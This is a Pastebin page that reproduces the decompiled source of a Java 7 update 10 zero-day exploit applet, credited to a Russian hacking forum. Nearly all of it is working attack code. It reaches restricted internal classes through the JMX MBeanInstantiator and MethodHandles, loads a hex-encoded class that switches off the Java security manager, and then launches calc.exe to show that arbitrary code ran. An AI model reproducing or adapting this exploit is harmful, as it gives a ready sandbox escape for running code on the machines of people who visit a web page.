SHARE
TWEET

Java 7u10 0Day PoC

SecurityObscurity Jan 10th, 2013 1,481 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. Java 0day 1.7.0_10 decrypted source
  3. Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
  4. From Russia with love.
  5.  
  6. http://security-obscurity.blogspot.com/2013/01/about-new-java-0-day-vulnerability.html
  7. */
  8.  
  9. import java.applet.Applet;
  10. import com.sun.jmx.mbeanserver.JmxMBeanServer;
  11. import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
  12. import com.sun.jmx.mbeanserver.MBeanInstantiator;
  13. import java.lang.invoke.MethodHandle;
  14. import java.lang.invoke.MethodHandles;
  15. import java.lang.invoke.MethodType;
  16. import java.lang.reflect.Method;
  17.  
  18.  
  19. public class Paunch extends Applet
  20. {
  21.  
  22.     public byte[] hex2Byte(String paramString)
  23.     {
  24.    
  25.         byte[] arrayOfByte = new byte[paramString.length() / 2];
  26.    
  27.         for (int i = 0; i < arrayOfByte.length; i++)
  28.         {
  29.           arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
  30.         }
  31.    
  32.         return arrayOfByte;
  33.      }
  34.  
  35. public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"+
  36.  "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"+
  37.  "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"+
  38.  "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"+
  39.  "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"+
  40.  "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"+
  41.  "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"+
  42.  "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"+
  43.  "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"+
  44.  "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"+
  45.  "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"+
  46.  "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"+
  47.  "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"+
  48.  "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"+
  49.  "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"+
  50.  "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"+
  51.  "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"+
  52.  "02000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";
  53.  
  54.  
  55.   public void init()
  56.   {
  57.  
  58.     try
  59.     {
  60.  
  61.       byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
  62.  
  63.       JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
  64.  
  65.       JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
  66.  
  67.       MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
  68.       ClassLoader a = null;
  69.       Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
  70.       Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
  71.       MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
  72.       MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
  73.       MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
  74.       MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
  75.       MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
  76.       Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
  77.  
  78.       MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
  79.  
  80.       MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
  81.  
  82.       MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
  83.  
  84.       MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
  85.       Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
  86.       MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
  87.       MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
  88.       Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
  89.       localClass3.newInstance();
  90.  
  91.       Runtime.getRuntime().exec("calc.exe");
  92.  
  93.  
  94.     }
  95.     catch (Throwable ex) {}
  96.  
  97.   }
  98.  
  99. }
RAW Paste Data
Top